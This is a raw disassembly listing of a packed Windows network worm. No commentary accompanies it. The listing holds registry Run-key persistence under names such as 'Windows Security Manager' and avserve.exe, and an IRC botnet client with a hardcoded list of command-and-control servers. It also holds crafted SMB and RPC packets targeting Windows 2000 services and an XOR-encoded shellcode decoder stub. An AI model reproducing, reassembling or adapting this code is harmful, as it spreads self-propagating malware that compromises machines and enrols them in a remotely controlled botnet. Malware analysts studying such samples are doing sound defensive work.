push offset aSoftwareMicros ; "SOFTWARE\\Microsoft\\Windows\\CurrentVersi"...
push 80000002h
mov ds:dword_405000, 0
call sub_403300
add esp, 14h
test eax, eax
jz short loc_40368A
push 2
push offset a1 ; "1"
push offset aClient ; "Client"
push offset aSoftwareMicr_0 ; "Software\\Microsoft\\Wireless"
push 80000002h
call sub_403380
lea edx, [esp+0F0h+var_C8]
push edx
push 0
call sub_403530
add esp, 1Ch
add esp, 0DCh
retn
; ---------------------------------------------------------------------------
loc_40368A: ; CODE XREF: sub_403610+47�j
lea eax, [esp+0DCh+var_C8]
lea ecx, [esp+0DCh+var_64]
push eax
push ecx
call dword_401048 ; lstrcmpi
test eax, eax
jnz short loc_4036E8
lea edx, [esp+0DCh+var_DC]
push 14h
push edx
push offset aClient ; "Client"
push offset aSoftwareMicr_0 ; "Software\\Microsoft\\Wireless"
push 80000002h
call sub_403300
add esp, 14h
test eax, eax
jnz short loc_4036FA
push offset aClient ; "Client"
push offset aSoftwareMicr_0 ; "Software\\Microsoft\\Wireless"
push 80000002h
mov ds:dword_405000, 1
call sub_4032C0
add esp, 0Ch
add esp, 0DCh
retn
; ---------------------------------------------------------------------------
loc_4036E8: ; CODE XREF: sub_403610+8C�j
lea eax, [esp+0DCh+var_C8]
lea ecx, [esp+0DCh+var_64]
push eax
push ecx
call sub_403530
add esp, 8
loc_4036FA: ; CODE XREF: sub_403610+17�j
; sub_403610+AE�j
add esp, 0DCh
retn
sub_403610 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_403710 proc near ; CODE XREF: sub_401210+29�p
; sub_401530+29�p ...
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
push 4
push 1000h
push eax
push 0
call dword_401044 ; VirtualAlloc
retn
sub_403710 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_403730 proc near ; CODE XREF: sub_401210+EE�p
; sub_401210+127�p ...
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
push 8000h
push 0
push eax
call dword_401040 ; VirtualFree
retn
sub_403730 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_403750 proc near ; CODE XREF: sub_401210+110�p
; sub_402240+9�p ...
jmp dword_4010F4
sub_403750 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_403760 proc near ; CODE XREF: sub_4016F0+5�p
arg_0 = byte ptr 4
push ecx
cmp eax, 1000h
lea ecx, [esp+4+arg_0]
jb short loc_403780
loc_40376C: ; CODE XREF: sub_403760+1E�j
sub ecx, 1000h
sub eax, 1000h
test [ecx], eax
cmp eax, 1000h
jnb short loc_40376C
loc_403780: ; CODE XREF: sub_403760+A�j
sub ecx, eax
mov eax, esp
test [ecx], eax
mov esp, ecx
mov ecx, [eax]
mov eax, [eax+4]
push eax
retn
sub_403760 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_403790 proc near ; CODE XREF: sub_401CA0+44�p
; sub_401CA0+71�p ...
jmp dword_4010F0
sub_403790 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_403796 proc near ; CODE XREF: sub_401E20+14B�p
; sub_401E20+1D5�p ...
jmp dword_4010EC
sub_403796 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40379C proc near ; CODE XREF: SEH_4022B0+5�j
; SEH_402500+5�j
jmp dword_4010E8
sub_40379C endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_4037B0 proc near ; CODE XREF: sub_402490+32�p
; sub_402A30+23�p
jmp dword_4010E4
sub_4037B0 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_4037B6 proc near ; CODE XREF: sub_4033F0+9B�p
jmp dword_401064
sub_4037B6 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_4037BC proc near ; CODE XREF: sub_4033F0+57�p
jmp dword_401058
sub_4037BC endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_4037C2 proc near ; CODE XREF: sub_4033F0+30�p
jmp dword_401054
sub_4037C2 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
SEH_4022B0 proc near ; DATA XREF: sub_4022B0+5�o
mov eax, offset dword_4037F8
jmp sub_40379C
SEH_4022B0 endp
; ---------------------------------------------------------------------------
align 10h
lea ecx, [ebp-7Ch]
jmp loc_401E00
; =============== S U B R O U T I N E =======================================
SEH_402500 proc near ; DATA XREF: sub_402500+8�o
mov eax, offset dword_403850
jmp sub_40379C
SEH_402500 endp
; ---------------------------------------------------------------------------
align 8
dword_4037F8 dd 19930520h, 2, 403818h, 1, 403828h, 3 dup(0) ; DATA XREF: SEH_4022B0�o
dd 0FFFFFFFFh, 0
dd 0FFFFFFFFh, 3 dup(0)
dd 2 dup(1), 403840h, 4 dup(0)
dd offset sub_4023E1
dword_403850 dd 19930520h, 1, 403870h, 5 dup(0) ; DATA XREF: SEH_402500�o
dd 0FFFFFFFFh, 4037E0h, 1E2h dup(0)
dword_404000 dd 206h, 2400h, 31415352h, 800h, 10001h, 0A495BDEFh, 0DD499F8Eh
; DATA XREF: sub_401190+42�o
dd 64DB1F45h, 0DE5B5C5h, 23CBE2AAh, 63639922h, 7318481Ch
dd 749AC3F2h, 4D855620h, 0AD0FE1CCh, 691506D3h, 0A8FD8D37h
dd 700B1698h, 45504FCEh, 324A3914h, 5C10E3EFh, 0DFBDD847h
dd 371EBA84h, 8B817380h, 7D4A0DF5h, 2DFE92E0h, 0C699C9C5h
dd 9C85E020h, 6A5068BDh, 8250B629h, 7F42C334h, 1C980811h
dd 9CE7B7B2h, 3D77899Dh, 0A4D3971Ah, 0A58D5029h, 8D463A96h
dd 1612E8FCh, 44AF10EBh, 0D0F84570h, 0B178966Ah, 0EB51439Fh
dd 7086A827h, 0DE098A39h, 0C1A1C214h, 0BF167A53h, 611A85C4h
dd 9829E70Fh, 8966209Eh, 0CB1FE53h, 0ECCA9407h, 0A11E75A3h
dd 0B4E8F91Dh, 1A4ECBC5h, 69D7F0DBh, 8C1A8739h, 18C67B94h
dd 3EB38213h, 0E0424BBFh, 8400EB67h, 0AA60B737h, 22D7D8B3h
dd 7A650480h, 86FF4BA6h, 0F6458558h, 56EEF96Eh, 32002FC9h
dd 0B7A63B4Ah, 0EBD3D87Ah
aCont db 'cont',0 ; DATA XREF: sub_401170+3�o
align 10h
loc_404120: ; DATA XREF: sub_4016F0+25C�o
; sub_4016F0+273�o ...
jmp short loc_404149
; ---------------------------------------------------------------------------
word_404122 dw 3612h ; DATA XREF: UPX0:00403243�w
dword_404124 dd 0ABAAAAD5h ; DATA XREF: UPX0:00403255�w
; ---------------------------------------------------------------------------
loc_404128: ; CODE XREF: UPX0:loc_404149�p
pop ebp
xor ecx, ecx
mov cx, 225h
lea esi, [ebp+5]
mov edi, esi
loc_404134: ; CODE XREF: UPX0:00404145�j
mov al, [esi]
cmp al, 99h
jnz short loc_40413F
inc esi
mov al, [esi]
sub al, 30h
loc_40413F: ; CODE XREF: UPX0:00404138�j
inc esi
xor al, 99h
mov [edi], al
inc edi
loop loc_404134
jmp short near ptr loc_404152+1
; ---------------------------------------------------------------------------
loc_404149: ; CODE XREF: UPX0:loc_404120�j
call loc_404128
bound esp, cs:[ebp+67h]
loc_404152: ; CODE XREF: UPX0:00404147�j
db 2Eh
jno short near ptr dword_404000+0E8h
cdq
leave
cdq
leave
cdq
leave
adc bh, ch
mov ebp, 9916FD91h
leave
sal dword ptr [edx+68h], 0AAh
inc edx
std
db 66h
stosb
std
adc [edx-670EE3ECh], bh
cdq
leave
cdq
leave
leave
rep cwde
icebp
cwde
cdq
leave
xchg bl, [ecx-67F68E37h]
cdq
leave
cdq
leave
nop
pop edi
retf
; ---------------------------------------------------------------------------
dw 9237h
dd 0BB1C9659h, 99C99998h, 997518C9h, 0C9999BC9h, 0F1CDC999h
dd 0C9999898h, 0D271C999h, 99C99998h, 47ECE4C9h, 995D1854h
dd 0C9999BC9h, 9FF3C999h, 9BF398F3h, 9998AF71h, 0F3C999C9h
dd 1065E368h, 99981D1Ch, 1AC999C9h, 5EFFD975h, 999BBD9Dh
dd 0DC12FFC9h, 0DD10FF4Dh, 0DC129BBDh, 3333AC4Fh, 0DD103333h
dd 59B29DBDh, 91BDE514h, 45123232h, 66CA89F3h, 99981D2Ch
dd 71C999C9h, 99C9996Fh, 13C999C9h, 1A744167h, 5992D95Dh
dd 99341C96h, 99C999C9h, 0F19DF3C9h, 9989C999h, 0F1C999C9h
dd 0C999C999h, 0F3C99998h, 6571C999h, 0C999C999h, 0F367C999h
dd 1C10F0E3h, 0C99998E5h, 99F3C999h, 0C999F1C9h, 9998C999h
dd 2C66C9C9h, 0C999981Dh, 2E71C999h, 0C999C999h, 0E86FC999h
dd 0F3C997C0h, 1D2C669Bh, 99C99998h, 993C71C9h, 99C999C9h
dd 0E5C1D8C9h, 0C959B2D5h, 0C99BF3C9h, 0C999F1C9h, 0C999C999h
dd 0F60414D9h, 99C99998h, 2971CAC9h, 0C999C999h, 688DC999h
dd 1C109161h, 0C99998F2h, 1AC3C999h, 0A7ED6661h, 0F35D12CDh
dd 0CBC9C999h, 98E52C66h, 0C999C999h, 98F22C66h, 0C999C999h
dd 0C9991171h, 0C999C999h, 96A6485Ah, 0F22C66C0h, 99C99998h
dd 99E171C9h, 99C999C9h, 0A7294CC9h, 149CF3EBh, 9998F604h
dd 0CAC999C9h, 0C999FF71h, 0C999C999h, 7126F434h, 71C999F3h
dd 99C999C2h, 0F9C999C9h, 0ECEF133Bh, 99C999AEh, 99C999C9h
dd 0B7C999C9h, 0E9EDFFC5h, 0B7FDE9ECh, 99FCE1FCh, 6 dup(99C999C9h)
dd 0FCF5CAC9h, 0C999E9FCh, 0F7EBFCF2h, 0ABAAF5FCh, 34C7C999h
dd 0B459AAF9h, 1E662A2Dh, 0E7E6ACC9h, 9CC9A5B7h, 829DB8BDh
dd 9271CDC9h, 0C999C999h, 19BFC999h, 0FD145135h, 720A95BDh
dd 0F934C791h, 0C999C871h, 0C999C999h, 12A5D212h, 9AE180D5h
dd 146FAA52h, 0C89A2A8Dh, 9A8B12B9h, 5859AA4Ah, 9BAB9E59h
dd 99A319DBh, 0A26CECC9h, 0ED85BDDDh, 0E8A2DF9Eh, 5544EB81h
dd 9ABDC812h, 8D2E964Ah, 85D812EBh, 9D125A9Ah, 105A9A09h
dd 0F885BDDDh, 98191C10h, 0C999C999h, 7F664966h, 8712FEFDh
dd 12C999A9h, 0C21295C2h, 12821285h, 0B75A91C2h, 0B7FDF7FCh
dd 0
dword_4043FC dd 85000000h, 424D53FFh, 72h, 0C8531800h, 3 dup(0)
; DATA XREF: sub_4016F0+1A2�o
dd 0FEFF0000h, 0
dd 2006200h
aPcNetworkProgr db 'PC NETWORK PROGRAM 1.0',0
db 2
db 4Ch ; L
db 41h, 4Eh, 4Dh
db 41h ; A
db 4Eh, 31h, 2Eh
db 30h ; 0
align 2
dw 5702h
aIndowsForWorkg db 'indows for Workgroups 3.1a',0
db 2
dd 2E314D4Ch, 30305832h, 4C020032h, 414D4E41h, 312E324Eh
dd 544E0200h, 204D4C20h, 32312E30h, 0
dword_404488 dd 0A4000000h, 424D53FFh, 73h, 0C8071800h, 3 dup(0)
; DATA XREF: sub_4016F0+1D9�o
dd 0FEFF0000h, 100000h, 0A400FF0Ch, 0A110400h, 0
dd 20000000h, 0
dd 0D400h, 4E006980h, 534D4C54h, 1005053h, 97000000h, 0E00882h
dd 4 dup(0)
aWindows2000219:
unicode 0, <Windows 2000 2195>,0
aWindows20005_0:
unicode 0, <Windows 2000 5.0>,0
align 10h
dd 0
dword_404534 dd 0DA000000h, 424D53FFh, 73h, 0C8071800h, 3 dup(0)
; DATA XREF: sub_4016F0+20A�o
dd 0FEFF0000h, 200800h, 0DA00FF0Ch, 0A110400h, 0
dd 57000000h, 0
dd 0D400h, 4E009F80h, 534D4C54h, 3005053h, 1000000h, 46000100h
dd 0
dd 47000000h, 0
dd 40000000h, 0
dd 40000000h, 6000000h, 40000600h, 10000000h, 47001000h
dd 15000000h, 48E0888Ah, 44004F00h, 19810000h, 0E4F27A6Ah
dd 0AF281C49h, 10742530h, 575367h, 6E0069h, 6F0064h, 730077h
dd 320020h, 300030h, 200030h, 310032h, 350039h, 570000h
dd 6E0069h, 6F0064h, 730077h, 320020h, 300030h, 200030h
dd 2E0035h, 30h, 0
dword_404614 dd 5C000000h, 424D53FFh, 75h, 0C8071800h, 3 dup(0)
; DATA XREF: sub_4016F0+95�o
dd 0FEFF0000h, 300800h, 5C00FF04h, 1000800h, 3100h, 5C005Ch
dd 390031h, 2E0032h, 360031h, 2E0038h, 2E0031h, 310032h
dd 5C0030h, 500049h
db 43h, 0, 24h
dword_40466B dd 3F000000h ; DATA XREF: sub_4016F0+CC�r
dword_40466F dd 3F3F3F3Fh ; DATA XREF: sub_4016F0+DF�r
byte_404673 db 0 ; DATA XREF: sub_4016F0+F7�r
align 8
dword_404678 dd 64000000h, 424D53FFh, 0A2h, 0C8071800h, 3 dup(0)
; DATA XREF: sub_4016F0+307�o
dd 4DC0800h, 400800h, 0DE00FF18h, 0E00DEh, 16h, 0
dd 2019Fh, 3 dup(0)
dd 3, 1, 40h, 2, 1103h, 6C005Ch, 610073h, 700072h, 63h
dd 0
dword_4046E4 dd 9C000000h, 424D53FFh, 25h, 0C8071800h, 3 dup(0)
; DATA XREF: sub_4016F0+338�o
dd 4DC0800h, 500800h, 48000010h, 0
dd 4, 2 dup(0)
dd 48005400h, 2005400h, 2600h, 10005940h, 50005Ch, 500049h
dd 5C0045h, 0
dd 30B0005h, 10h, 48h, 1, 10B810B8h, 0
dd 1, 10000h, 3919286Ah, 11D0B10Ch, 0C000A89Bh, 0F52ED94Fh
dd 0
dd 8A885D04h, 11C91CEBh, 8E89Fh, 6048102Bh, 2, 0
dword_404788 dd 0F40C0000h, 424D53FFh, 25h, 0C8071800h, 3 dup(0)
; DATA XREF: sub_4016F0+51B�o
dd 4DC0800h, 600800h, 0A0000010h, 0Ch, 4, 2 dup(0)
dd 0A0005400h, 200540Ch, 2600h, 100CB140h, 50005Ch, 500049h
dd 5C0045h, 0
dd 3000005h, 10h, 0CA0h, 1, 0C88h, 90000h, 3ECh, 0
dd 3ECh, 0
off_404808 dd offset loc_401491+4 ; DATA XREF: sub_4016F0+54C�o
dd 3, 40707Ch, 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd offset loc_40707C
dd 1, 0
dd 1, 0
dd offset loc_40707C
dd 1, 0
dd 1, 0
dd offset loc_40707C
dd 1, 0
dd 1, 0
dd 138578h, 0E9A65BABh, 0
dword_40489C dd 0F8100000h, 424D53FFh, 2Fh, 0C8071800h, 3 dup(0)
; DATA XREF: sub_4016F0+373�o
dd 0FEFF0800h, 600800h, 0DE00FF0Eh, 4000DEh, 0FF000000h
dd 8FFFFFFh, 10B800h, 4010B800h, 0
dd 0EE10B900h, 1000005h, 10h, 10B8h, 1, 200Ch, 90000h
dd 0DADh, 0
dd 0DADh, 0
dword_404908 dd 0D80F0000h, 424D53FFh, 25h, 0C8071800h, 3 dup(0)
; DATA XREF: sub_4016F0+3A6�o
dd 1180800h, 700800h, 84000010h, 0Fh, 4, 2 dup(0)
dd 84005400h, 200540Fh, 2600h, 0F9540h, 50005Ch, 500049h
dd 5C0045h, 0
dd 2000005h, 10h, 0F84h, 1, 0F6Ch, 90000h, 0
dword_40497C dd 0 ; DATA XREF: sub_4016F0+3D6�o
dd 40A89Ah, 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 40A89Ah, 1, 0
dd 1, 0
dd 40A89Ah, 1, 0
dd 1, 0
dd 40A89Ah, 1, 0
dd 1, 4 dup(0)
dd 586E6957h, 72502050h, 6Fh, 0Ah dup(0)
dword_404A40 dd 1004600h ; DATA XREF: sub_4016F0+2AC�r
dd 1, 326E6957h, 7250206Bh, 6Fh, 0Ah dup(0)
dword_404A7C dd 7515123Ch ; DATA XREF: sub_4016F0+43B�r
dd 2, 326E6957h, 5341206Bh, 0Bh dup(0)
dd 751C123Ch, 0Fh dup(0)
dword_404AF8 dd 6EB06EBh ; DATA XREF: sub_4016F0+47D�r
align 10h
dword_404B00 dd 73255C5Ch, 6370695Ch, 24h ; DATA XREF: sub_4016F0+65�o
dword_404B0C dd 1CEC8166h ; DATA XREF: sub_4016F0+A�r
dword_404B10 dd 0E4FF07h ; DATA XREF: sub_4016F0+F�r
off_404B14 dd offset aGazProm_ru ; DATA XREF: sub_402500+DA�o
; sub_402500+140�r
; "gaz-prom.ru"
dd offset aMoscowAdvokat_ ; "moscow-advokat.ru"
off_404B1C dd offset aGraz_at_eu_und ; DATA XREF: sub_402500+112�o
; "graz.at.eu.undernet.org"
dd offset aFlanders_be_eu ; "flanders.be.eu.undernet.org"
dd offset aCaen_fr_eu_und ; "caen.fr.eu.undernet.org"
dd offset aBrussels_be_eu ; "brussels.be.eu.undernet.org"
dd offset aLosAngeles_ca_ ; "los-angeles.ca.us.undernet.org"
dd offset aWashington_dc_ ; "washington.dc.us.undernet.org"
dd offset aLondon_uk_eu_u ; "london.uk.eu.undernet.org"
dd offset aIrc_tsk_ru ; "irc.tsk.ru"
dd offset aLia_zanet_net ; "lia.zanet.net"
dd offset aGaspode_zanet_ ; "gaspode.zanet.org.za"
dd offset dword_404B48
dword_404B48 dd 2E637269h, 2E72616Bh, 74656Eh ; DATA XREF: UPX0:00404B44�o
aGaspode_zanet_ db 'gaspode.zanet.org.za',0 ; DATA XREF: UPX0:00404B40�o
align 4
aLia_zanet_net db 'lia.zanet.net',0 ; DATA XREF: UPX0:00404B3C�o
align 4
aIrc_tsk_ru db 'irc.tsk.ru',0 ; DATA XREF: UPX0:00404B38�o
align 4
aLondon_uk_eu_u db 'london.uk.eu.undernet.org',0 ; DATA XREF: UPX0:00404B34�o
align 4
aWashington_dc_ db 'washington.dc.us.undernet.org',0 ; DATA XREF: UPX0:00404B30�o
align 4
aLosAngeles_ca_ db 'los-angeles.ca.us.undernet.org',0 ; DATA XREF: UPX0:00404B2C�o
align 4
aBrussels_be_eu db 'brussels.be.eu.undernet.org',0 ; DATA XREF: UPX0:00404B28�o
aCaen_fr_eu_und db 'caen.fr.eu.undernet.org',0 ; DATA XREF: UPX0:00404B24�o
aFlanders_be_eu db 'flanders.be.eu.undernet.org',0 ; DATA XREF: UPX0:00404B20�o
aGraz_at_eu_und db 'graz.at.eu.undernet.org',0 ; DATA XREF: UPX0:off_404B1C�o
aMoscowAdvokat_ db 'moscow-advokat.ru',0 ; DATA XREF: UPX0:00404B18�o
align 10h
aGazProm_ru db 'gaz-prom.ru',0 ; DATA XREF: UPX0:off_404B14�o
aAbcdefghijkl_0 db 'abcdefghijklmnopqrstuvwxyz',0 ; DATA XREF: sub_401CA0+1E�o
align 4
aAbcdefghijklmn db 'ABCDEFGHIJKLMNOPQRSTUVWXYZ',0 ; DATA XREF: sub_401CA0+B�o
align 4
aUserS8S db 'USER %s 8 * :%s',0Dh,0Ah,0 ; DATA XREF: sub_401E20+1F2�o
align 4
aAlready db 'already',0 ; DATA XREF: sub_401E20+145�o
; sub_401E20+1CF�o
aNickS db 'NICK %s',0Dh,0Ah,0 ; DATA XREF: sub_401E20+E0�o
; sub_401E20+16E�o
align 4
aPassS db 'PASS %s',0Dh,0Ah,0 ; DATA XREF: sub_401E20+A2�o
align 4
aPongS db 'PONG%s',0Dh,0Ah,0 ; DATA XREF: sub_4020A0+5A�o
align 4
aPing db 'PING',0 ; DATA XREF: sub_4020A0+D�o
; sub_402130+B2�o
align 4
a451 db '451',0 ; DATA XREF: sub_402130+8C�o
aJoinS db 'JOIN %s',0Dh,0Ah,0 ; DATA XREF: sub_402130+15�o
align 4
aQuitS db 'QUIT %s',0Dh,0Ah,0 ; DATA XREF: sub_402240+28�o
align 4
aPrivmsgSS db 'PRIVMSG %s %s',0Dh,0Ah,0 ; DATA XREF: sub_402400+51�o
a7: ; DATA XREF: sub_402500+64�o
unicode 0, <7>,0
a_: ; DATA XREF: sub_402500+58�o
unicode 0, <_>,0
a_exe db '.exe',0 ; DATA XREF: sub_402710+71�o
; sub_403530+4B�o
align 4
asc_404D28: ; DATA XREF: sub_402710+4B�o
; sub_403530+57�o
unicode 0, <\>,0
aMozilla4_0Comp db 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)',0
; DATA XREF: sub_402710+11�o
align 10h
aJoin db 'JOIN',0 ; DATA XREF: sub_402850+1B6�o
align 4
aQ: ; DATA XREF: sub_402850+17B�o
unicode 0, <q>,0
aDD7 db '%d,%d,7',0 ; DATA XREF: sub_402850+158�o
aI: ; DATA XREF: sub_402850+13B�o
unicode 0, <i>,0
a1_0 db '-1',0 ; DATA XREF: sub_402850+11B�o
align 4
asc_404D7C: ; DATA XREF: sub_402850+EE�o
unicode 0, <|>,0
aE: ; DATA XREF: sub_402850+BF�o
unicode 0, <e>,0
aUterm7 db 'uterm7',0 ; DATA XREF: UPX0:00402DFC�o
align 4
aU7 db 'u7',0 ; DATA XREF: UPX0:00402DF2�o
align 10h
aU6 db 'u6',0 ; DATA XREF: UPX0:00402DE8�o
align 4
aR10 db 'r10',0 ; DATA XREF: UPX0:00402DDE�o
aFtpupd_exe db 'ftpupd.exe',0 ; DATA XREF: UPX0:00402DCC�o
align 4
aU db '-u',0 ; DATA XREF: UPX0:00402DB2�o
align 4
asc_404DA8 db 0Dh,0Ah,0 ; DATA XREF: sub_402EE0+197�o
align 4
aUseridUnix db ' : USERID : UNIX : ',0 ; DATA XREF: sub_402EE0+132�o
aSoftwareMicros db 'SOFTWARE\Microsoft\Windows\CurrentVersion\Run',0
; DATA XREF: sub_4034A0+3F�o
; sub_4034A0+56�o ...
align 10h
aSystray db 'SysTray',0 ; DATA XREF: sub_403530+92�o
; sub_403610+24�o
dd 6 dup(0)
aSoftwareMicr_0 db 'Software\Microsoft\Wireless',0 ; DATA XREF: sub_403610+55�o
; sub_403610+9A�o ...
aClient db 'Client',0 ; DATA XREF: sub_403610+50�o
; sub_403610+95�o ...
align 4
aAvserve2_exe db 'avserve2.exe',0 ; DATA XREF: sub_4034A0+21�o
align 4
aAvserve_exe db 'avserve.exe',0 ; DATA XREF: sub_4034A0+19�o
aWindowsSecurit db 'Windows Security Manager',0 ; DATA XREF: sub_4034A0+11�o
align 4
aWinupdate db 'WinUpdate',0 ; DATA XREF: sub_4034A0+9�o
align 4
a1: ; DATA XREF: sub_403610+4B�o
unicode 0, <1>,0
dd 7 dup(0)
dword_404E98 dd 40h dup(0) ; DATA XREF: sub_402850+E3�o
; sub_402850+F3�o
dword_404F98 dd 0 ; DATA XREF: sub_402850+33�w
; sub_402850+D9�r ...
dword_404F9C dd 0 ; DATA XREF: sub_402500:loc_40258C�o
; sub_402850+70�r ...
dword_404FA0 dd 8 dup(0) ; DATA XREF: sub_402500+95�o
; sub_402850+E�o
dword_404FC0 dd 0 ; DATA XREF: sub_402850+26�r
; sub_402850+123�w
dword_404FC4 dd 0 ; DATA XREF: UPX0:00402C15�r
; sub_402C60+76�w
dword_404FC8 dd 0 ; DATA XREF: sub_402850+14C�r
; UPX0:00402C36�o ...
dword_404FCC dd 0 ; DATA XREF: UPX0:loc_402C10�r
; sub_402C60+60�w ...
dword_404FD0 dd 6Ch ; DATA XREF: UPX0:00402E09�w
; sub_403530+A6�r
dword_404FD4 dd 8 dup(0) ; DATA XREF: sub_402EE0+47�o
; sub_402EE0+169�o
dword_404FF4 dd 0 ; DATA XREF: sub_402C60+D7�w
; UPX0:00403231�r
dword_404FF8 dd 400000h ; DATA XREF: UPX0:00402DA0�w
dword_404FFC dd 0 ; DATA XREF: sub_402850+147�r
; sub_403140+4F�o ...
UPX0 ends
; Section 2. (virtual address 00005000)
; Virtual size : 00003000 ( 12288.)
; Section size in file : 00003000 ( 12288.)
; Offset to raw data for section: 00005000
; Flags E0000040: Data Executable Readable Writable
; Alignment : default
; ===========================================================================
; Segment type: Pure code
; Segment permissions: Read/Write/Execute
UPX1 segment para public 'CODE' use32
assume cs:UPX1
;org 405000h
assume es:nothing, ss:nothing, ds:UPX0, fs:nothing, gs:nothing
dword_405000 dd 0 ; DATA XREF: sub_402500+42�r
; sub_403610+33�w ...
dd 3FFh dup(0)
dd 0C4h, 40h, 72695601h, 6C617574h, 65657246h, 69560100h
dd 61757472h, 6C6C416Ch, 100636Fh, 7274736Ch, 69706D63h
dd 43010041h, 4679706Fh, 41656C69h, 69570100h, 6578456Eh
dd 43010063h, 74616572h, 6F6F5465h, 6C65686Ch, 53323370h
dd 7370616Eh, 746F68h, 6F725001h, 73736563h, 69463233h
dd 747372h, 72655401h, 616E696Dh, 72506574h, 7365636Fh
dd 4F010073h, 506E6570h, 65636F72h, 1007373h, 636F7250h
dd 33737365h, 78654E32h, 47010074h, 6F4D7465h, 656C7564h
dd 646E6148h, 41656Ch, 74654701h, 6D6D6F43h, 4C646E61h
dd 41656E69h, 65440100h, 6574656Ch, 656C6946h, 6C010041h
dd 63727473h, 417970h, 74654701h, 7473614Ch, 6F727245h
dd 53010072h, 65747379h, 6D69546Dh, 466F5465h, 54656C69h
dd 656D69h, 74654701h, 74737953h, 69546D65h, 100656Dh
dd 736F6C43h, 6E614865h, 656C64h, 69725701h, 69466574h
dd 100656Ch, 61657243h, 69466574h, 41656Ch, 74736C01h
dd 79706372h, 100416Eh, 43746553h, 65727275h, 6944746Eh
dd 74636572h, 4179726Fh, 65470100h, 73795374h, 446D6574h
dd 63657269h, 79726F74h, 45010041h, 54746978h, 61657268h
dd 53010064h, 76457465h, 746E65h, 69615701h, 726F4674h
dd 676E6953h, 624F656Ch, 7463656Ah, 72430100h, 65746165h
dd 65726854h, 1006461h, 61657243h, 76456574h, 41746E65h
dd 736C0100h, 656C7274h, 100416Eh, 65656C53h, 47010070h
dd 69547465h, 6F436B63h, 746E75h, 74736C01h, 74616372h
dd 45010041h, 50746978h, 65636F72h, 1007373h, 7274736Ch
dd 41706D63h, 72430100h, 65746165h, 6574754Dh, 1004178h
dd 61657243h, 72506574h, 7365636Fh, 1004173h, 65746E49h
dd 636F6C72h, 4964656Bh, 6572636Eh, 746E656Dh, 65520100h
dd 69466461h, 100656Ch, 46746547h, 53656C69h, 657A69h
dd 74654701h, 75646F4Dh, 6946656Ch, 614E656Ch, 41656Dh
dd 0D100h, 0
dd 65520100h, 65724367h, 4B657461h, 78457965h, 52010041h
dd 65536765h, 6C615674h, 78456575h, 52010041h, 75516765h
dd 56797265h, 65756C61h, 417845h, 67655201h, 6E65704Fh
dd 4579654Bh, 1004178h, 44676552h, 74656C65h, 6C615665h
dd 416575h, 67655201h, 736F6C43h, 79654B65h, 62410100h
dd 5374726Fh, 65747379h, 7568536Dh, 776F6474h, 100416Eh
dd 70797243h, 65724374h, 48657461h, 687361h, 79724301h
dd 61487470h, 61446873h, 1006174h, 70797243h, 72655674h
dd 53796669h, 616E6769h, 65727574h, 43010041h, 74707972h
dd 74736544h, 48796F72h, 687361h, 79724301h, 65447470h
dd 6F727473h, 79654B79h, 72430100h, 52747079h, 61656C65h
dd 6F436573h, 7865746Eh, 43010074h, 74707972h, 75716341h
dd 43657269h, 65746E6Fh, 417478h, 79724301h, 6D497470h
dd 74726F70h, 79654Bh, 0DE00h, 0E400h, 72730100h, 646E61h
dd 435F5F01h, 72467878h, 48656D61h, 6C646E61h, 1007265h
dd 73727473h, 1007274h, 63727473h, 1007268h, 646E6172h
dd 0E90000h, 0FC0000h, 77010000h, 69727073h, 4166746Eh
dd 0F40000h, 1040000h, 49010000h, 7265746Eh, 4F74656Eh
dd 556E6570h, 416C72h, 746E4901h, 656E7265h, 61655274h
dd 6C694664h, 49010065h, 7265746Eh, 4F74656Eh, 416E6570h
dd 6E490100h, 6E726574h, 65477465h, 6E6F4374h, 7463656Eh
dd 74536465h, 657461h, 10000h, 11800h, 73FF00h, 0FF0008FFh
dd 6FFF0039h, 0BFF00h, 0FF0034FFh, 0CFF0012h, 4FF00h, 0FF0016FFh
dd 9FF0017h, 2FF00h, 0FF000DFFh, 3FF0001h, 10FF00h, 13FFh
dd 0
dd 4550h, 2014Ch, 40B2334Ch, 2 dup(0)
dd 10F00E0h, 6010Bh, 3000h, 1200h, 0
db 90h
db 2Dh, 2 dup(0)
dd 1000h, 4000h, 400000h, 1000h, 200h, 4, 0
dd 4, 0
dd 6000h, 400h, 0
dd 2, 100000h, 1000h, 100000h, 1000h, 0
dd 10h, 2 dup(0)
dd 3878h, 8Ch, 14h dup(0)
dd 1000h, 164h, 6 dup(0)
dd 7865742Eh, 74h, 2EEAh, 1000h, 3000h, 400h, 3 dup(0)
dd 0E0040020h, 7461642Eh, 61h, 1004h, 4000h, 1000h, 3400h
dd 3 dup(0)
dd 0C0000040h, 5000h, 3A68h, 5444h, 9CE7B7B2h, 3D77899Dh
dd 0A4D3971Ah, 0FFFFFF29h, 96A5D01Bh, 0FC8D463Ah, 0EB1612E8h
dd 7044AF10h, 6AD0F845h, 9FB17896h, 0FFEB5143h, 27FFFF42h
dd 397086A8h, 14DE098Ah, 53C1A1C2h, 34BF167Ah, 0E70F611Ah
dd 0FF9E9829h, 20FFFFFFh, 0FE538966h, 94070CB1h, 75A3ECCAh
dd 0F91DA11Eh, 0CBC5B4E8h, 0F0DB1A4Eh, 873969D7h, 0FF948C1Ah
